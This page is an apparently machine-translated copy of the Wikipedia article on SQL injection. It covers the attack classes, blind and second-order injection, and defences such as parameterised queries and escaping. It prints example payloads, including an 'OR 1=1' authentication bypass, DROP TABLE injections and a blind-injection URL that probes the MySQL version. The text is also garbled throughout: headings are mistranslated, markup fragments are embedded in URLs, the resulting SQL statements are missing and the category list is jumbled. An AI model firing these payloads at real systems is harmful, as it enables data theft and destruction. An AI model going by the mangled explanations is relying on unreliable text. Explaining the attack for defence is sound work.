SQL injection is a code injection technique, which is used to attack data-driven applications, where nasty SQL statements are inserted into the entry field for execution (eg to dump the database content to an attacker). SQL injection should exploit security vulnerabilities in application software, for example, when user input is incorrectly filtered for escape literal string characters embedded in SQL statements or user inputs are not typed strongly and executed unexpectedly. SQL injection is known as attack vector for website but can be used to attack any type of SQL database.
SQL injection attacks allow an attacker to spoof an identity, tamper with existing data, cause rejection issues such as canceling transactions or changing balances, allowing complete disclosure of all data on the system, destroying data or making it unavailable, and being the administrator of a database server.
In the 2012 study, it was observed that the average web application received 4 campaign attacks per month, and the retailers received twice as many attacks as other industries.
Video SQL injection
Histori
The first public discussion about SQL injection began to emerge around 1998; for example, a 1998 article in Phrack Magazine.
Maps SQL injection
Form
SQL injection (SQLI) is considered one of the top 10 web application vulnerabilities of 2007 and 2010 by the Open Web Application Security Project. In 2013, SQLI is rated as the number one attack on the top ten OWASP. There are four main sub-classes of SQL injection:
- Classical SQLI
- Blind Injection or SQL Inference
- SQLI SQLI specific management system
- Composite SQLI
-
- Insufficient SQL authentication injection
- SQL attack DDoS attacks
- SQL injection DNS hijacking
- SQL XSS Injection
The Storm Worm is one of the representations of SQLI Compounded.
This classification represents the state of SQLI, honoring its evolution until 2010 - further improvements are being made.
Technical implementation
Misfounded release characters
This form of SQL injection occurs when the user input is not filtered for the escape characters and then passed to the SQL statement. This results in potential manipulation of statements performed on the database by the end-user application.
The following code line describes this vulnerability:
statement = "SELECT * FROM users WHERE name = ' "userName" ' ;"
This SQL code is designed to pull records from a specific user name from a user table. However, if the "userName" variable is created in a certain way by malicious users, SQL statements can do more than the code authors would like. For example, set the variable "userName" as:
'OR' 1 '=' 1
or use comments to even block the rest of the query (there are three kinds of SQL comments). All three lines have space at the end:
'OR' 1 '=' 1 '- 'OR' 1 '=' 1 '{ 'OR' 1 '=' 1 '/* translates one of the following SQL statements with the parent language:
If this code is to be used in the authentication procedure, this example may be used to force the selection of any data fields (*) of the all users rather than from one particular username as the coder, since the evaluation of '1' = ' 1 'is always right.
The following "userName" values ​​in the statement below will result in deletion of the "users" table and the selection of all data from the "userinfo" table (essentially revealing each user's information), using an API that allows multiple statements:
a ';DROP TABLE user ; * FROM userinfo WHERE 't' = ' t
This input presents the final SQL statement as follows and is specified:
Although most SQL server implementations allow multiple statements to be executed with one call in this way, some SQL APIs such as the PHP function mysql_query () do not allow this for security reasons. This prevents attackers from injecting completely separate queries, but does not stop them from modifying the query.
Incorrect type handling
This form of SQL injection occurs when a user-provided field is not strongly typed or is not checked for type restrictions. This can happen when a numeric field is to be used in a SQL statement, but the programmer does not make a check to validate that the user-provided input is numeric. As an example:
: = " SELECT * FROM userinfo WHERE id = "a_variable"; " It is clear from this statement that the author intends a_variabel to be the number associated with the "id" field. However, if it is actually a string, then the end user can manipulate the statement they choose, thus ignoring the need for escape characters. For example, setting a_variable to
1; DROP TABLE users
will drop (delete) the "user" table from the database, because SQL becomes:
SQL Blind Injection
Blind SQL Injection is used when a web application is vulnerable to SQL injection but the result of the injection is invisible to the attacker. Pages with vulnerabilities may not be the one that displays the data but will be displayed differently depending on the result of a logical statement that is injected into the legitimate SQL statement that is called for that page. This type of attack is traditionally regarded as time intensive because new statements need to be made for every bit it gets, and depending on its structure, the attack may consist of many failed requests. Recent advances have allowed every request to recover multiple bits, with no demand failing, allowing more consistent and efficient extraction. There are several tools that can automate this attack once the location of the vulnerability and target information has been set.
Conditional response
One type of SQL injection blind forces the database to evaluate the logical statement on a regular app screen. For example, a book review website uses query strings to determine which book reviews to display. So the URL http://books.example.com/showReview.php?ID=5 will cause the server to run the query
from where it will fill the review page with data from the review with ID 5, stored in the table bookreviews. The query occurs entirely on the server; users do not know the names of databases, tables, or fields, nor do users know the query string. Users only see that the URL above returns a book review. A hacker can load URLs and http : // books . example . com / showReview . php ? = 5 OR 1 = 1 , which can generate questions
each. If the original review loads with the URL "1 = 1" and the blank page or error is returned from the URL "1 = 2", and the page returned has not been made to notify the user that the invalid input, or in other words, has been caught by input test script, the site may be vulnerable to SQL injection attacks because the request will be successful through both cases. Hackers can continue with a query string designed to reveal the MySQL version number running on the server: http : span> // books . example . com / showReview . php ? 5 AND substring ( span> @@ version , 1 , INSTR <@ span> version , '.' ) - 1 ) = 4 , which will show book reviews on the server running MySQL 4 and blank pages or the reverse error. Hackers can continue to use the code in the query string to gather more information from the server until another gap is found or the goal is reached.
Second order SQL injection
Second order SQL injection occurs when the delivered value contains malicious commands that are stored rather than directly executed. In some cases, the application can encode the SQL statement correctly and store it as a valid SQL. Then, another part of the application without control to protect against SQL injection may run a stored SQL statement. This attack requires more knowledge of how the value delivered will be used. The automatic web application security scanner will not easily detect this type of SQL injection and may need to be manually instructed where to check for evidence that it is being attempted.
Mitigation
SQL injection is a well known and easily preventable attack with simple steps. After a clear SQL injection attack on TalkTalk in 2015, the BBC reports that security experts are surprised that such large companies will be vulnerable to it.
Parameter statement
With most development platforms, parameter statements that work with parameters can be used (sometimes called placeholders or bind variables) instead of embedding user input in statements. Placeholder can only store values ​​of a given type and not an arbitrary SQL fragment. Therefore SQL injection will only be treated as an odd (and possibly invalid) parameter value.
In many cases, the SQL statement is fixed, and each parameter is a scalar, not a table. The user input is then assigned (bound) to the parameter.
Enforcement at the coding level
Using object-relational mapping libraries avoids the need to write SQL code. The ORM library will basically generate SQL statement parameters from object-oriented code.
Escaping
The easy, though error-prone way to prevent injections is to escape characters that have a special meaning in SQL. The Manual for SQL DBMS explains which characters have special meaning, which enables comprehensive blacklisting of characters in need of translation. For example, each occurrence of a single quote ( ') in the parameter must be replaced by two single quotes (' ') to form a valid SQL literal string. For example, in PHP it's common to avoid parameters using the mysqli_real_escape_string (); before sending the SQL query:
This function adds a backslash to the following characters: \ x00 , \ n , \ r , \ , ', " and \ x1a .This function is usually used to create secure data before sending a request to MySQL.
PHP has similar functions for other database systems like pg_escape_string () for PostgreSQL. The addslashes (string $ str) function works to remove characters, and is used primarily for queries on databases that do not have an escape function in PHP. It returns a string with backslashes before the characters that need to be quoted in the database query, etc. This character is a single quote ('), double quote ("), backslash (\) and NUL (NULL bytes).
Passing strings that pass regularly to SQL is a prone error because it is easy to forget to release a given string. Creating a transparent layer to secure the input can reduce this error-prone, if not completely eliminate it.
Pattern examination
Integer, float or boolean, string parameters can be checked if the value is a valid representation for the given type. Strings that should follow some tight patterns (date, UUID, alphanumeric only, etc.) Can be checked if it matches this pattern.
Database permissions
Limiting permissions on database logs used by web applications only to what is required may help reduce the effectiveness of any SQL injection attacks that exploit any bugs in web applications.
Source of the article : Wikipedia
0 Comments